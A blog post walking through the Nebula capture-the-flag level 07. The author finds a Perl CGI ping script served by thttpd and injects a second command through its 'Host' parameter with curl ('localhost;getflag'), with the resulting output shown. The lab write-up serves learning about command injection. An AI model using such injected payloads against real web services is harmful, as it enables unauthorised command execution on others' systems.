"Whatever Pages"
Blog About RSS

Reachable from the web

Mar 28, 2015 • Category: Ctf, nebula

         Nebula 07 Agenda: “The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server.”
         “It was the Perl’s script, the one who swooned over the network flow.


As usual, started with target account’s home investigation.

 1 level07@nebula:/home/flag07$ ls -la
 2 .........
 3 -rw-r--r-- 1 root   root    3719 2011-11-20 21:22 thttpd.conf
 4 
 5 level07@nebula:/home/flag07$ cat ./thttpd.conf | less
 6 
 7 # This file is for thttpd processes created by /etc/init.d/thttpd.
 8 .........
 9 # Specifies an alternate port number to listen on.
10 port=7007
11 .........
12 # Specifies a directory to chdir() to at startup. This is merely a convenience
13 # you could just as easily do a cd in the shell script that invokes the program.
14 dir=/home/flag07
15 .........
16 # Specifies a wildcard pattern for CGI programs, for instance "**.cgi" or
17 # "/cgi-bin/*". See thttpd(8) for details.
18 cgipat=**.cgi
19 .........

It appears that we have running thttpd server on 7007 port with specified config from flag07 home folder (which in turns will execute all *.cgi scripts from there). 

1 level07@nebula:/home/flag07$ ps aux | grep http
2 flag07 1187 ......... /usr/sbin/thttpd -C /home/flag07/thttpd.conf
3 flag16 1189 ......... /usr/sbin/thttpd -C /home/flag16/thttpd.conf

Indeed! And not the only one =).

From “index.cgi” source we can see that it takes value of “Host” argument, passes it as input to ping utility and print out the result. So let’s make request with curl tool and use some kind of separator to inject the favour “getflag” command. Don’t forget about URL encoding.

 1 $curl --data-urlencode "Host=localhost;getflag" 192.168.1.3:7007/index.cgi
 2 <html><head><title>Ping results</title></head><body><pre>PING localhost 
 3 (127.0.0.1) 56(84) bytes of data.
 4 64 bytes from localhost (127.0.0.1): icmp_req=1 ttl=64 time=17.3 ms
 5 64 bytes from localhost (127.0.0.1): icmp_req=2 ttl=64 time=17.2 ms
 6 64 bytes from localhost (127.0.0.1): icmp_req=3 ttl=64 time=39.0 ms
 7 
 8 --- localhost ping statistics ---
 9 3 packets transmitted, 3 received, 0% packet loss, time 2012ms
10 rtt min/avg/max/mdev = 17.251/24.558/39.073/10.263 ms
11 You have successfully executed getflag on a target account

Line #11, indicates the end of destination point. BTW “192.168.1.3” is address of Nebula virtual machine in my local network (use ifconfig to find out for your case).

P.S. You could also try to deal with request from web browser or wget util + some online url encoder (or at least wiki percent-encoding of reserved characters table) as helper for clear argument performing.

Avatar

Assembled by Nobody

Surprise motherf*cker!